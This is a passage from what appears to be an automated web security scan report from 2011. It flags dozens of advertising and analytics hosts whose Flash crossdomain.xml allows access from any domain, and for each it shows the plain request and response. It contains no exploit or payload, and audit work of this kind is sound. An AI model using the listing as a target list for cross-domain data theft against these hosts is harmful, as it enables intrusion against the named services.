Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "49c238-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "78412-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/xml
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.25. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6034
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:24:57 GMT
Expires: Wed, 07 Sep 2011 00:24:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60104

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.27. http://goku.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.28. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2b9b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web202
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:33 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.29. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.30. http://img-cdn.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.31. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.32. http://intelligence.marykay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.33. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.34. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
ETag: "4ded34bc=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

4.35. http://load.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315229954000"
Last-Modified: Mon, 05 Sep 2011 13:39:14 GMT
host: rcv-srv33
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.36. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:53 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.38. http://network.realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11d-d0-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.39. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:12 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.40. http://oimg.m.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
xserver: www282
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.41. http://oimg.nbcuni.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www78
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.42. http://omni.csc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www614
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.43. http://oracle.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
xserver: www423
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www431
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.46. http://p.brilig.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:19:04 GMT
ETag: "55fb9-ab-4a861e6c7f200"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=74
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>


4.47. http://pg.links.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2faa"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:35 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.origin.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2884"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.49. http://ping.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Wed, 27 Apr 2011 03:48:25 GMT
ETag: "c3167-e0-4a1de5011d440"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

4.50. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.51. http://pixel.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.52. http://pixel.everesttech.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051143-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=999077
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.53. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.54. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.55. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

